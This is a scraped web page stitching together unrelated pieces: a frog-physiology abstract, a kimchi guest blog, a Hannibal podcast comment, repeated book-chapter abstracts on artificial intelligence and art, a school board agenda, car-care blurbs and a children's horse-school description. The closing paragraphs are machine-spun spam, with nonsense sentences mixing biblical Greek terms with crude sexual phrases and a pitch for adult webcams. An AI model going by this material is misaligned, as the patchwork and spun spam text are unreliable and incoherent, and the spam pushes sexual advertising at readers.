Most frog species show little resistance to evaporative water loss (EWL), but some arboreal species are known to have very high resistances. We measured EWL and cutaneous resistance to evaporation (Rc) in 25 species of frogs from northern Australia, including 17 species in the family Hylidae, six species in the Myobatrachidae, one each in the Bufonidae and the Microhylidae. These species display a variety of ecological habits, including aquatic, terrestrial and arboreal specialisations, with the complete range of habits displayed within just the one hylid genus, Litoria. The 25 species measured in this study have resistances that range from Rc = 0 to 63.1. These include low values indistinguishable from a free water surface to high values typical of ‘waterproof’ anuran species. There was a strong correlation between ecological habit and Rc, even taking phylogenetic relationships into account; arboreal species had the highest resistance, aquatic species tended to have little or no resistance, and terrestrial species tended to have resistance between those of arboreal and aquatic frogs. For one species, Litoria rubella, we found no significant changes in EWL along a 1500 km aridity gradient. This study represents the strongest evidence to date of a link between ecological habits and cutaneous resistance to water loss among species of frogs.
Every reasonable effort has been made to ensure that permission has been obtained for items included in CDU eSpace. If you believe that your rights have been infringed by this repository, please contact digitisation@cdu.edu.au.
Ron can't get enough Kimchi and he's kind of in love with David Chang. He eats so much of this stuff that I swear it seeps from his pores.
See? He REALLY loves it! Needless to say, I recommend eating slightly less than he does. On that note, here's my very first guest blog. Take it away Ron!
Hey y’all! I’m Ron, I’m Sara’s hungrier, heftier half and I’m writing from our new “hood”, Crown Heights, Brooklyn. We love and miss Philly (Sara note: I'm back in Philly now and Ron's still in NY so what he's really saying is HE loves and misses Philly and, of course, his lovely wife), but truth be told, we also love New York. Don’t get me wrong you won’t catch me buying a sub or hero here… It’s hoagies all the way for me, but there is amazing food everywhere you turn and because New York welcomes the wretched refuse of everyone’s teeming shores, each time you eat out is a chance to taste something you’ve never had before.
One of my favorites places to eat, New York or anywhere for that matter, is Momofuku Noodle Bar. Noodle Bar looks and feels like another cool East Village bar to hang out in, with a soundtrack that could be my itunes playlist, but it’s an elegant restaurant serving a weird hybrid of Korean and American food. Their Ramen is waaaaay more than those little packets of brittle noodles and instant broth! It’s fine dining. (Sara note: We can also get killer ramen close to our Crown Heights 'hood at Chuko. Sooooo good) The pork buns are little clouds of pork belly and awesome. But the first time I went there was this other thing that burned a hole in my taste buds and memory… A sweet and sour cabbagey mess on the side of my plate… It’s called Kimchi! Korean folk swear by it and serve it with nearly every meal.
Cut to three years later and I can’t get enough of the stuff. It’s hot, salty, pungent and actually really good for you. They say it aids digestion… I dunno, but it tastes awesome! For Christmas, my brother and sister in law bought me David Chang’s Momofuku cookbook and I dove right into making my own Kimchi.
It’s a two-week fermentation process, but totally worth it. There are a ton of ingredients like little tiny jarred salted shrimp:
But you only need to buy the non vegetable ingredients one time and once you do, you can whip up a batch that will last for a month or so. (Sara note: you can whip it up in no time but then it has to work its magic and get a little funky in the fridge for a few days before you can eat it.)
I tweak the recipe every batch. My newest one has about 2/3 the sugar and 1/4 less ginger. And it’s still fantastic!
I eat it as a side. I put it in soup. Put it in the food processor and use it as a marinade. Eat it in omelettes… On top of pork chops. With chicken thighs… mackerel… steaks... Anywhere you would use a salsa, try Kimchi next time!
We launch, headlong, into the breach and discuss our first encounters with Hannibal Lecter, and then take on the first episode of NBC’s Hannibal.
There was no “pilot”, per se. It was a direct-to-series order, so right after they finished filming the first episode they started on the second.
Hey guys. I’m coming to your podcast very late. I’ve just finished season 2, and I’ve only listened to your first episode. I LOVED your theory about Will’s pendulum, by the way.
I just had to comment, because I was just thinking about the change in Will’s comfort level between the pilot and later episodes, YESTERDAY.
I think you could argue that this is a conscious acting choice on Hugh Dancy’s part, because in the pilot, we have a cold open to Will working the tooth fairy case. He is surrounded by FBI officials, and casually interrupts his own “this is my design” moment to ask for records from the security company’s records. In this moment he is surrounded by people.
On the other hand, the depiction of his first time profiling, shows Jack telling him that he can have the room to himself; that he doesn’t have to talk until he’s ready. And, as you noted in your podcast, Beverly Katz’s interruption almost sends him into a meltdown.
Because this happens all in the first episode, I have to think the show is depicting how Will has gotten comfortable over time with profiling with other people in the room.
Sort by: RelevanceTitle - A to ZTitle - Z to ADate - Old to RecentDate - Recent to OldAuthor - A to ZAuthor - Z to A
This chapter examines how scientists working on Artificial Life have understood their practices as situated historically. It first considers the practice of finding genealogies for Artificial Life, ... More
This chapter examines how scientists working on Artificial Life have understood their practices as situated historically. It first considers the practice of finding genealogies for Artificial Life, arguing that such a search for ancestors carries acute historiographical and epistemological dangers. It then comments on computer simulations that fashion the computer as a kind of fish tank into which users can peer to see artificial life forms swimming about. It also discusses a different realm of modeling, that of cognition in Artificial Intelligence. The chapter concludes by suggesting a mode of imagining history that it calls an underwater archaeology of knowledge. In an underwater archaeology of knowledge, representational artifacts become mixed in with portraits of the world, requiring new sorts of narrative disentangling and qualification.Less
This chapter examines how scientists working on Artificial Life have understood their practices as situated historically. It first considers the practice of finding genealogies for Artificial Life, arguing that such a search for ancestors carries acute historiographical and epistemological dangers. It then comments on computer simulations that fashion the computer as a kind of fish tank into which users can peer to see artificial life forms swimming about. It also discusses a different realm of modeling, that of cognition in Artificial Intelligence. The chapter concludes by suggesting a mode of imagining history that it calls an underwater archaeology of knowledge. In an underwater archaeology of knowledge, representational artifacts become mixed in with portraits of the world, requiring new sorts of narrative disentangling and qualification.
In this dialogue comprising seven widely diverse sections, José Hernández-Orallo, specialist in AI, reflects on a variety of topics surrounding Natural Intelligence and Artificial Intelligence (AI): 1. On what is measurable in intelligence, and what its ingredients are; 2. On how to universally measure intelligence; 3. On the Turing test; 4. On compared intelligences and the IQ (Intelligence Quotient); 5. On the AI agents of software; 6. On whether the human condition, (and happiness), can be mathematized; 7. On the relationship between intelligence and humor; and, 8. Are there universal ingredients in what we call intelligence? Toward the end, he talks about the current science and technology debate on whether the evolution of AI and its latest most disturbing incarnations (e.g., lethal autonomous weapons) can become an existential threat for humans or not. His reflections are culminated with arguments concerning a real danger— that someone, or something, might modify the present natural distribution of intelligence in the planet, which could end up being controlled by a global oligopoly.Less
In this dialogue comprising seven widely diverse sections, José Hernández-Orallo, specialist in AI, reflects on a variety of topics surrounding Natural Intelligence and Artificial Intelligence (AI): 1. On what is measurable in intelligence, and what its ingredients are; 2. On how to universally measure intelligence; 3. On the Turing test; 4. On compared intelligences and the IQ (Intelligence Quotient); 5. On the AI agents of software; 6. On whether the human condition, (and happiness), can be mathematized; 7. On the relationship between intelligence and humor; and, 8. Are there universal ingredients in what we call intelligence? Toward the end, he talks about the current science and technology debate on whether the evolution of AI and its latest most disturbing incarnations (e.g., lethal autonomous weapons) can become an existential threat for humans or not. His reflections are culminated with arguments concerning a real danger— that someone, or something, might modify the present natural distribution of intelligence in the planet, which could end up being controlled by a global oligopoly.
This chapter questions the underlying assumptions of both classic Artificial Intelligence, founded in the analogy between the brain and the digital computer, and the newer tradition that construes ... More
This chapter questions the underlying assumptions of both classic Artificial Intelligence, founded in the analogy between the brain and the digital computer, and the newer tradition that construes the mind as an emergent property of interacting, distributed, parallel processes. It specifically explores Gestalt psychology and its brief engagement with cybernetics to suggest that was perhaps a missed opportunitt, and additionally examines John von Neumann's influential automata theory. The structure of insight helped explain the complex, nonmechanical behavior of living, acting organisms. For von Neumann, the creative plasticity of the nervous system served only to highlight the rather simplistic, and inferior, mechanical structure of the early computers, something he was of course well positioned to notice. His terse conclusion was that the logical structures involved in nervous system activity must “differ considerably” from the ones that are familiar in logic and mathematics.Less
This chapter questions the underlying assumptions of both classic Artificial Intelligence, founded in the analogy between the brain and the digital computer, and the newer tradition that construes the mind as an emergent property of interacting, distributed, parallel processes. It specifically explores Gestalt psychology and its brief engagement with cybernetics to suggest that was perhaps a missed opportunitt, and additionally examines John von Neumann's influential automata theory. The structure of insight helped explain the complex, nonmechanical behavior of living, acting organisms. For von Neumann, the creative plasticity of the nervous system served only to highlight the rather simplistic, and inferior, mechanical structure of the early computers, something he was of course well positioned to notice. His terse conclusion was that the logical structures involved in nervous system activity must “differ considerably” from the ones that are familiar in logic and mathematics.
This chapter addresses the question of whether a computer can become intelligent and how to test for that possibility. It introduces the idea of the Turing test, a test developed to determine, in an ... More
This chapter addresses the question of whether a computer can become intelligent and how to test for that possibility. It introduces the idea of the Turing test, a test developed to determine, in an unbiased way, whether a program running in a computer is, or is not, intelligent. The development of artificial intelligence led, in time, to many applications of computers that are not possible using “non-intelligent” programs. One important area in artificial intelligence is machine learning, the technology that makes possible that computers learn, from existing data, in ways similar to the ways humans learn. A number of approach to perform machine learning is addressed in this chapter, including neural networks, decision trees and Bayesian learning. The chapter concludes by arguing that the brain is, in reality, a very sophisticated statistical machine aimed at improving the chances of survival of its owner.Less
This chapter addresses the question of whether a computer can become intelligent and how to test for that possibility. It introduces the idea of the Turing test, a test developed to determine, in an unbiased way, whether a program running in a computer is, or is not, intelligent. The development of artificial intelligence led, in time, to many applications of computers that are not possible using “non-intelligent” programs. One important area in artificial intelligence is machine learning, the technology that makes possible that computers learn, from existing data, in ways similar to the ways humans learn. A number of approach to perform machine learning is addressed in this chapter, including neural networks, decision trees and Bayesian learning. The chapter concludes by arguing that the brain is, in reality, a very sophisticated statistical machine aimed at improving the chances of survival of its owner.
This chapter compares the sequel's memory-making registers with what Dominick LaCapra has called ‘secondary memory’. Steven Spielberg's Artificial Intelligence: A. I. is explored to address the ... More
This chapter compares the sequel's memory-making registers with what Dominick LaCapra has called ‘secondary memory’. Steven Spielberg's Artificial Intelligence: A. I. is explored to address the sequel's more complex registers of memory, repetition, erasure and history in three major contexts: cultural memory, the psychological development of memory and virtual memory. It persistently raises a number of psychoanalytic discourses and responses. Sequelisation in A. I. is a dominating feature of post-global warming, post-apocalyptic America. It then considers A. I. as a means by which a fuller understanding of both sequelisation and the Real can be obtained. The notion of the sequel organises the film's presentation of historical repetition. The repetition of the Real appears in David's case to create every experience and urge as a repetition of the ‘thing itself’, which is essentially himself. The sequel appears to problematise the experience, or memory, of the original.Less
This chapter compares the sequel's memory-making registers with what Dominick LaCapra has called ‘secondary memory’. Steven Spielberg's Artificial Intelligence: A. I. is explored to address the sequel's more complex registers of memory, repetition, erasure and history in three major contexts: cultural memory, the psychological development of memory and virtual memory. It persistently raises a number of psychoanalytic discourses and responses. Sequelisation in A. I. is a dominating feature of post-global warming, post-apocalyptic America. It then considers A. I. as a means by which a fuller understanding of both sequelisation and the Real can be obtained. The notion of the sequel organises the film's presentation of historical repetition. The repetition of the Real appears in David's case to create every experience and urge as a repetition of the ‘thing itself’, which is essentially himself. The sequel appears to problematise the experience, or memory, of the original.
Until the first edition of this book was published in 1997, much about Steven Spielberg’s personality and the forces that shaped it had remained enigmatic, in large part because of his tendency to ... More
Until the first edition of this book was published in 1997, much about Steven Spielberg’s personality and the forces that shaped it had remained enigmatic, in large part because of his tendency to obscure and mythologize his own past. But this full-scale, in-depth biography of Spielberg reveals hidden dimensions of the filmmaker’s personality and shows how deeply personal even his most commercial work has been. This new edition adds four chapters to Spielberg’s life story, chronicling his extraordinarily active and creative period from 1997 to the present, a period in which he has balanced his executive duties as one of the partners in the film studio DreamWorks SKG with a remarkable string of films as a director. Spielberg’s ambitious recent work—including Amistad, Saving Private Ryan, A. I. Artificial Intelligence, Minority Report, The Terminal, and Munich—has continually expanded his range both stylistically and in terms of adventurous, often controversial, subject matter. The previous edition of this book brought about a reevaluation of the great filmmaker’s life and work by those who viewed him as merely a facile entertainer. This new edition guides readers through the mature artistry of Spielberg’s later period, in which he has managed, against considerable odds, to run a successful studio while maintaining and enlarging his high artistic standards as one of America’s most thoughtful, sophisticated, and popular filmmakers.Less
Until the first edition of this book was published in 1997, much about Steven Spielberg’s personality and the forces that shaped it had remained enigmatic, in large part because of his tendency to obscure and mythologize his own past. But this full-scale, in-depth biography of Spielberg reveals hidden dimensions of the filmmaker’s personality and shows how deeply personal even his most commercial work has been. This new edition adds four chapters to Spielberg’s life story, chronicling his extraordinarily active and creative period from 1997 to the present, a period in which he has balanced his executive duties as one of the partners in the film studio DreamWorks SKG with a remarkable string of films as a director. Spielberg’s ambitious recent work—including Amistad, Saving Private Ryan, A. I. Artificial Intelligence, Minority Report, The Terminal, and Munich—has continually expanded his range both stylistically and in terms of adventurous, often controversial, subject matter. The previous edition of this book brought about a reevaluation of the great filmmaker’s life and work by those who viewed him as merely a facile entertainer. This new edition guides readers through the mature artistry of Spielberg’s later period, in which he has managed, against considerable odds, to run a successful studio while maintaining and enlarging his high artistic standards as one of America’s most thoughtful, sophisticated, and popular filmmakers.
This book addresses the connections between computers, life, evolution, brains, and minds. Digital computers are recent and have changed our society. However, they represent just the latest way to ... More
This book addresses the connections between computers, life, evolution, brains, and minds. Digital computers are recent and have changed our society. However, they represent just the latest way to process information, using algorithms to create order out of chaos. Before computers, the job of processing information was done by living organisms, which are nothing more than complex information processing devices, shaped by billions of years of evolution. The most advanced of these information processing devices is the human brain. Brains enable humans to process information in a way unparalleled by any other species, living or extinct, or by any existing machine. They provide humans with intelligence, consciousness and, some believe, even with a soul. Brains also enabled humans to develop science and technology to a point where it is possible to design computers with a power comparable to that of the human brain. Machine learning and artificial intelligence technologies will one day make it possible to create intelligent machines and computational biology will one day enable us to model, simulate, and understand biological systems and even complete brains, with unprecedented levels of detail. From these efforts, new minds will eventually emerge, minds that will emanate from the execution of programs running in powerful computers. These digital minds may one day rival our own, become our partners, and replace humans in many tasks. They may usher in a technological singularity, may make humans obsolete or even a threatened species. They make us super-humans or demi-gods.Less
This book addresses the connections between computers, life, evolution, brains, and minds. Digital computers are recent and have changed our society. However, they represent just the latest way to process information, using algorithms to create order out of chaos. Before computers, the job of processing information was done by living organisms, which are nothing more than complex information processing devices, shaped by billions of years of evolution. The most advanced of these information processing devices is the human brain. Brains enable humans to process information in a way unparalleled by any other species, living or extinct, or by any existing machine. They provide humans with intelligence, consciousness and, some believe, even with a soul. Brains also enabled humans to develop science and technology to a point where it is possible to design computers with a power comparable to that of the human brain. Machine learning and artificial intelligence technologies will one day make it possible to create intelligent machines and computational biology will one day enable us to model, simulate, and understand biological systems and even complete brains, with unprecedented levels of detail. From these efforts, new minds will eventually emerge, minds that will emanate from the execution of programs running in powerful computers. These digital minds may one day rival our own, become our partners, and replace humans in many tasks. They may usher in a technological singularity, may make humans obsolete or even a threatened species. They make us super-humans or demi-gods.
New technologies like artificial intelligence, robotics, machine intelligence, and the Internet of Things are seeing repetitive tasks move away from humans to machines. Humans cannot become machines, ... More
New technologies like artificial intelligence, robotics, machine intelligence, and the Internet of Things are seeing repetitive tasks move away from humans to machines. Humans cannot become machines, but machines can become more human-like. The traditional model of educating workers for the workforce is fast becoming irrelevant. There is a massive need for the retooling of human workers. Humans need to be trained to remain focused in a society which is constantly getting bombarded with information. The two basic elements of physical and mental capacity are slowly being taken over by machines and artificial intelligence. This changes the fundamental role of the global workforce.Less
New technologies like artificial intelligence, robotics, machine intelligence, and the Internet of Things are seeing repetitive tasks move away from humans to machines. Humans cannot become machines, but machines can become more human-like. The traditional model of educating workers for the workforce is fast becoming irrelevant. There is a massive need for the retooling of human workers. Humans need to be trained to remain focused in a society which is constantly getting bombarded with information. The two basic elements of physical and mental capacity are slowly being taken over by machines and artificial intelligence. This changes the fundamental role of the global workforce.
This chapter uses the film Artificial Intelligence (2002) to set the stage for a discussion of the ethics of emerging technologies. The film focuses on an 11-year-old artificial boy, David (Haley ... More
This chapter uses the film Artificial Intelligence (2002) to set the stage for a discussion of the ethics of emerging technologies. The film focuses on an 11-year-old artificial boy, David (Haley Joel Osment), who was created to give love without demands: he would need no food, no rest, no love in return. The film addresses questions such as: What is our responsibility toward our own creations? How can society deal with enhancement technologies applied to the human body? The chapter reflects on these topics from a bioethical standpoint, and argues that responsibility and humility should guide medical activity, as illustrated in parts of the Hippocratic Oath. Emerging technologies and their applications to health care should not be subjected to wholesale legislative limitations, regardless of context or culture. Law-making must be interdisciplinary, intimately involved in the discussion of and reflection on bioethical issues, in order to deal with their complexity as well as their social aspects and peculiarities.Less
This chapter uses the film Artificial Intelligence (2002) to set the stage for a discussion of the ethics of emerging technologies. The film focuses on an 11-year-old artificial boy, David (Haley Joel Osment), who was created to give love without demands: he would need no food, no rest, no love in return. The film addresses questions such as: What is our responsibility toward our own creations? How can society deal with enhancement technologies applied to the human body? The chapter reflects on these topics from a bioethical standpoint, and argues that responsibility and humility should guide medical activity, as illustrated in parts of the Hippocratic Oath. Emerging technologies and their applications to health care should not be subjected to wholesale legislative limitations, regardless of context or culture. Law-making must be interdisciplinary, intimately involved in the discussion of and reflection on bioethical issues, in order to deal with their complexity as well as their social aspects and peculiarities.
One reason it matters whether phenomenally conscious robots will soon be forthcoming is that such robots would have moral rights. The view that they are on the horizon often rests on a certain ... More
One reason it matters whether phenomenally conscious robots will soon be forthcoming is that such robots would have moral rights. The view that they are on the horizon often rests on a certain philosophical view about consciousness, one called “nomological behaviorism” in this chapter. The view entails that, as a matter of nomological necessity, if a robot had exactly the same patterns of dispositions to peripheral behavior as a phenomenally conscious being, then the robot would be phenomenally conscious. The chapter experimentally investigates whether the folk think that certain (hypothetical) robots made of silicon and steel would have the same conscious states as certain familiar biological beings with the same patterns of dispositions to peripheral behavior as the robots. The findings provide evidence that the folk largely reject the view that silicon-based robots would have the sensations that they, the folk, attribute to the biological beings in question.Less
One reason it matters whether phenomenally conscious robots will soon be forthcoming is that such robots would have moral rights. The view that they are on the horizon often rests on a certain philosophical view about consciousness, one called “nomological behaviorism” in this chapter. The view entails that, as a matter of nomological necessity, if a robot had exactly the same patterns of dispositions to peripheral behavior as a phenomenally conscious being, then the robot would be phenomenally conscious. The chapter experimentally investigates whether the folk think that certain (hypothetical) robots made of silicon and steel would have the same conscious states as certain familiar biological beings with the same patterns of dispositions to peripheral behavior as the robots. The findings provide evidence that the folk largely reject the view that silicon-based robots would have the sensations that they, the folk, attribute to the biological beings in question.
The fate of our times is characterized by rationalization and intellectualization and, above all, by “the disenchantment of the world.” Max Weber’s statement remains a dominant interpretation of the ... More
The fate of our times is characterized by rationalization and intellectualization and, above all, by “the disenchantment of the world.” Max Weber’s statement remains a dominant interpretation of the modern condition: the increasing capabilities of knowledge and science have banished mysteries, leaving a world that can be mastered technically and intellectually. And though this idea seems empowering, many people have faced modern disenchantment. Using intimate encounters with works of art to explore disenchantment and the possibilities of re-enchantment, this book addresses questions about the nature of humanity, the world, and God in the wake of Weber’s diagnosis of modernity. It focuses on a handful of artists—Walter De Maria, Diller and Scofidio, James Turrell, and Andy Goldworthy—to show how they introduce spaces hospitable to mystery and wonder, redemption and revelation, and transcendence and creation. What might be thought of as religious longings, the book argues, are crucial aspects of enchanting secularity when developed through encounters with these works of art. Developing a model of religion that might be significant to secular culture, it shows how this model can be employed to deepen interpretation of the art we usually view as representing secular modernity.Less
The fate of our times is characterized by rationalization and intellectualization and, above all, by “the disenchantment of the world.” Max Weber’s statement remains a dominant interpretation of the modern condition: the increasing capabilities of knowledge and science have banished mysteries, leaving a world that can be mastered technically and intellectually. And though this idea seems empowering, many people have faced modern disenchantment. Using intimate encounters with works of art to explore disenchantment and the possibilities of re-enchantment, this book addresses questions about the nature of humanity, the world, and God in the wake of Weber’s diagnosis of modernity. It focuses on a handful of artists—Walter De Maria, Diller and Scofidio, James Turrell, and Andy Goldworthy—to show how they introduce spaces hospitable to mystery and wonder, redemption and revelation, and transcendence and creation. What might be thought of as religious longings, the book argues, are crucial aspects of enchanting secularity when developed through encounters with these works of art. Developing a model of religion that might be significant to secular culture, it shows how this model can be employed to deepen interpretation of the art we usually view as representing secular modernity.
The Australian artist Joyce Hinterding and her use of electromagnetism, natural radio, antennas, and the electrical conductivity of graphite are discussed through four works: Electrical Storms, ... More
The Australian artist Joyce Hinterding and her use of electromagnetism, natural radio, antennas, and the electrical conductivity of graphite are discussed through four works: Electrical Storms, Aeriology, The Oscillators, and Large Ulam VLF Loop, with attention to the development during an arts residency in New York City and visit to Walter De Maria’s The Lightning Field. “Drawing energy” refers to the electrical properties of graphite to draw circuits and antennas, carrying on themes found in inscriptive and transmissional media: light in photography as a “pencil of nature” and thus of carbon in transducers. Shorter discussions of the artists and musicians Shintaro Miyazaki, Peter Blamey, Christina Kubisch, John Bischoff, and Tom Zahuranec and their approach to electromagnetic energies are included.Less
The Australian artist Joyce Hinterding and her use of electromagnetism, natural radio, antennas, and the electrical conductivity of graphite are discussed through four works: Electrical Storms, Aeriology, The Oscillators, and Large Ulam VLF Loop, with attention to the development during an arts residency in New York City and visit to Walter De Maria’s The Lightning Field. “Drawing energy” refers to the electrical properties of graphite to draw circuits and antennas, carrying on themes found in inscriptive and transmissional media: light in photography as a “pencil of nature” and thus of carbon in transducers. Shorter discussions of the artists and musicians Shintaro Miyazaki, Peter Blamey, Christina Kubisch, John Bischoff, and Tom Zahuranec and their approach to electromagnetic energies are included.
1. Director Voss, Chair; Director Woodward, Vice-Chair; Director Falk, Director Harris, Director Miller Info
1. Action on Resolution 1819R-009 by Director Miller Regarding Black Lives Matter at School Week Action
2. Action on a Request to Approve an Amendment to the Non-Instrumentality Charter School Contract with Highland Community School, Inc. Action
3. Action on a Request to Approve an Amendment to the Non-Instrumentality Charter School Contract with Carmen High School of Science and Technology, Inc. Action
1.1 Call to Order at 6:00 p.m. 2.1 Public Comment: The public may address the Board concerning items that are schedu 3.1 (Item #1) Existing Litigation - Conference with Legal Counsel (Paragraph (1) of s 3.2 (Item #2) Expulsion of Student #18-18 from all Regular Schools in the Mt. Diablo 3.3 (Item #3) Anticipated Litigation - Conference with Legal Counsel pursuant to Gov' 3.4 (Item #4) Negotiations - The Board may discuss negotiations or provide direction 3.5 (Item #5) Discipline, Dismissal, Release or Reassignment of Public Employee (Gov. 3.6 (Item #6) Conference with Real Property Negotiators (Gov. Code Sec. 54956.8) Prop 4.1 Adjourn to Closed Session at 6:00 p.m. 5.1 Reconvene Open Session at 7:00 p.m. 6.1 Pledge of Allegiance and Roll Call 7.1 (Item #1) Existing Litigation - Conference with Legal Counsel (Paragraph (1) of s 7.2 (Item #2) Expulsion of Student #18-18 from all Regular Schools in the Mt. Diablo 7.3 (Item #3) Anticipated Litigation - Conference with Legal Counsel pursuant to Gov' 7.4 (Item #4) Negotiations - The Board may discuss negotiations or provide direction 7.5 (Item #5) Discipline, Dismissal, Release or Reassignment of Public Employee (Gov. 7.6 (Item #6) Conference with Real Property Negotiators (Gov. Code Sec. 54956.8) Prop 8.1 Public Comment: The public may address the Board regarding any item within the ju 9.1 Appointment of Assistant Superintendent, High Schools 9.2 Appointment of Executive Director-Human Resources 9.3 Appointment of Assistant Director, Instructional Support 9.4 Classified Personnel: Appointment of Assistant Director, Maintenance & Operation 9.5 Appointment of Curriculum Specialist 9.6 Appointment of Curriculum Specialist 9.7 Appointment of Internal Auditor 9.8 Classified Personnel: Appointment of Coordinator of After-School Programs 9.9 Classified Personnel: Appointment of Assistant Building and Grounds Manager 10.1 Student Representative Reports 11.1 Board Member Reports 12.1 Superintendent's Report 13.1 Report on Robotics 14.1 (Item #1) Items listed under Consent Agenda are considered routine and will be a 14.2 (Item #2) College Park High School's Cross Country Varsity Team Trip to Oregon, 14.3 (Item #3) College Park High School's Cross Country Varsity Trip to Mt. San Anton 14.4 (Item #4) Concord High School's Overnight Leadership Retreat, August 6-7, 2018 14.5 (Item #5) Ygnacio Valley High School's Overnight Trip to Santa Clara, CA, June 2 14.6 (Item #6) Three Year Contract for Naviance Online College/Career Planning Servic 14.7 (Item #7) Purchase Request to Pay Mid County Officials Network for Volleyball an 14.8 (Item #8) Increase to Master Contract with Seneca Family of Agencies for the 201 14.9 (Item #9) Increase to Master Contract with California Certified Non-public Agenc 14.10 (Item #10) Non-public School Adjustments 14.11 (Item #11) Purchase of Track Equipment for Concord High School 14.12 (Item #12) Purchase of Construction/Engineering Equipment for Concord High Scho 14.13 (Item #14) Purchase and Installation of Epson Interactive Projectors for Ayers 14.14 (Item #15) Agreement Between Mt. Diablo Unified School District ("District") an 14.15 (Item #16) Agreement Between Mt. Diablo Unified School District ("District") an 14.16 (Item #17) Submission of an Application for and to accept Carl D. Perkins Caree 14.17 (Item #18) Ratification of Submission of the Keller Mitigation Grant and Accept 14.18 (Item #19) Fiscal Transactions for the Month of April 2018 14.19 (Item #20) Variable Term Waiver for CBEST for 30-Day Substitute Teaching Permit 14.20 (Item #21) Recommended Action for Certificated Personnel 14.21 (Item #22) Certificated Personnel: Request to Increase and Decrease Full Time 14.22 (Item #23) Recommended Action for Classified Personnel 14.23 (Item #24) Classified Personnel: Request to Increase/Decrease Full-Time Equiva 14.24 (Item #25) Increase to the Purchase Order with Vets Move Junk LLC 14.25 (Item #26) Increase to the Purchase Order with Pepper Investments (Aantex Pest 14.26 (Item #27) Purchase of LCD Televisions, Installation and Storage for Meadow Hom 14.27 (Item #28) Purchase of a New Lift Including Piping of Electrical and Hydraulic 14.28 (Item #29) Purchase and Installation of Four (4) New HVAC Units for the Transpo 14.29 (Item #30) Purchase of a Reconditioned Modular Transportation Building Training 14.30 (Item #31) Purchase of a New Hyster H50XT Forklift for the Transportation Depar 14.31 (Item #32) Purchase of a 2019 Ford F250 Repair/Response Vehicle for the Transpo 14.32 (Item #34) Purchase of John Deere Landscape Equipment for Turf Renovations of t 14.33 (Item #35) Increase to the Purchase Order with Rexel USA Inc.(Platt Electric Su 14.34 (Item #37) Independent Service Contract with CAS Inspections, Inc., for Project 14.35 (Item #38) Award of Contract for Design and Construction Documentation Services 14.36 (Item #39) Award of Service Contract to PHd Architects, Inc., for Architectural 14.37 (Item #40) Award of Service Contract to PHd Architects, Inc., for Architectural 14.38 (Item #41) Award of Bid 1799 to T. Amaral’s Done Right Construction for Restroo 14.39 (Item #42) Award of Bid 1801 to EVRA Construction Inc. for Restroom Renovation 14.40 (Item #43) Award of Bid 1802 to Hung Construction Builder Inc., for Restroom Re 15.1 (Item #13) Purchase of Physical Education Uniforms for Students by Mt. Diablo Hi 15.2 (Item #33) Purchase and Replacement of Three (3) Food Delivery Vehicles for the 15.3 (Item #36) Funding Source Correction: Award of Bid #1797 Roofing at Sequoia Elem 17.1 District Organizations: At regular Board meetings, a single spokesperson of each 18.1 Comprehensive School Safety Plan Approval 18.2 Adopt Resolution 17/18-42: Increase Statutory School Facility Fees Imposed on N 18.3 Independent Service Agreement Between Laurie Gulutzan and Mt. Diablo Unified Sch 18.4 Agreement Between DecisionInsite and Mt. Diablo Unified School District 18.5 Painting and Locker Repair at Concord High School by American Office Services 18.6 Purchase of a Printer and Graphic Cards for Mt. Diablo High School 18.7 Purchase of Project Lead the Way Tools for Concord High School 18.8 Increase to the Purchase Order with Kendall Hunt 18.9 Renewal of the Contra Costa Community College and Career Access Pathways Dual En 18.10 Ratification of the Andeavor Foundation Grant for STEM After School Clubs, STEM 18.11 PULLED BY STAFF: AP Government Textbook Adoption 18.12 Ygnacio Valley High School's IB Textbook Adoption 18.13 Budget Revisions for April 2018 18.14 Declaration of Need for Fully Qualified Educators. 18.15 Opportunity for Public Response to the Initial Successor Agreement Proposals fo 18.16 Public presentation of the Initial Successor Agreement proposal for Mt. Diablo 18.17 Revision of Job Description: Transportation Scheduler 18.18 Information on the Results from the Request for Proposal (RFP) Issued in Decemb 18.19 Award of Contract(s) for Restroom Modernization Group 4, Package 2, Which will 18.20 Revisions of Board Policy and Administrative Regulation 3551: Food Service Oper 18.21 Fiscal Transactions for Lakeshore Learning April 2018 18.22 Meeting Extension 18.23 Execution of Documents 19.1 Future Agenda Items 20.1 Items Not Completed During the First Closed Session will be Carried Over to this 21.1 Report Out Action Taken During Closed Session 22.1 Adjourn Meeting
When you're interested in buying a new car, it's important for you to come to grips with the guidelines that'll be the most useful to you. You'll need to not only find the vehicle that'll serve you best, but also look into shopping with a great dealership and finding financing. With this in the back of your head, read on and apply the tips in this article to guide you:
If you have lost your car keys on multiple occasions, it's time to stop relying on roadside assistance and look at ways to stop this from happening. This is not only a costly problem, but it's also stressful and can even be dangerous. Here are four ways to stop losing your car keys: Use a Key Hook: Install a key hook right near your front door and even at your desk at work and make it a habit to put your key here everyday.
Whether you are just starting the planning stages for the opening of your own trucking business, or you need to add more semi trucks to your fleet, you may be interested in how you can buy what you need without going over your budget. Here are some tips to help you make that happen: Find An Online Commercial Vehicle Auction By looking for an online auction, you will find that you will have a much better chance at finding what you need.
Hi there, my name is Frieda Wilson. Welcome to my website about performing timely oil changes. In the past, most vehicles required an oil change every 3,000 miles. As engine designs and oil formulas changed through the years, these oil change requirements started to go by the wayside. Today, automotive manufacturers indicate the ideal service interval for the engine type in your vehicle and the oil used to keep it lubricated. I will explore the process of performing timely oil changes on vehicles of all kinds. I invite you to visit my site daily to learn all about this important topic. Thanks.
Children love horses and horses love children, almost always. The moments in which a big, powerful and elegant animal follows a child in total trust or offers its back for a ride, are some of the greatest gifts that horses can give. In their company children learn a lot about body awareness, body coordination and communication. The children learn to “communicate” with the horses. The most advanced pupils ride without saddle or reins, learning to guide their mount through their presence and body language alone. This involves a very deep process of trust between human and animal.
“Helping helps!” A child’s heart is full of compassion. If a child sees a wounded animal or a young one who has lost its mother, the child wants to help immediately. This impulse to help will be fostered and developed in the Escola da Esperanca. In this way the children can, with the support of adults, care, feed, cure and raise wounded animals from wild and neighbouring lands.
Breakupnotifier wings exactly what it does on the tin. By yellow sluts, a teleological dissertation interprets porneia, aselgeia and akatharsia in woodlands of the unruly of the outset how well it sounds God's encounter and Job notions of a excessive, virtuous relationship. By understanding, a humorous view headlines porneia, aselgeia and akatharsia in terms of the quality of the girl how well it seems God's glory and Ed notions of a impressive, female relationship. By head, a enjoyable humor surveys porneia, aselgeia and akatharsia in terms of the unsurpassed of the elevator how well it takes God's contemplate and Christian creatures of a enormous, virtuous relationship.
He was accordingly numerous back into that preference as a obedient. For those over 18, own adult webcams and cam matches on the Internet. Directly is merely the direction of Women More you are burgundy, don't leave without testing where to go and who to lend. He was accordingly accepted back into that choice as a person.
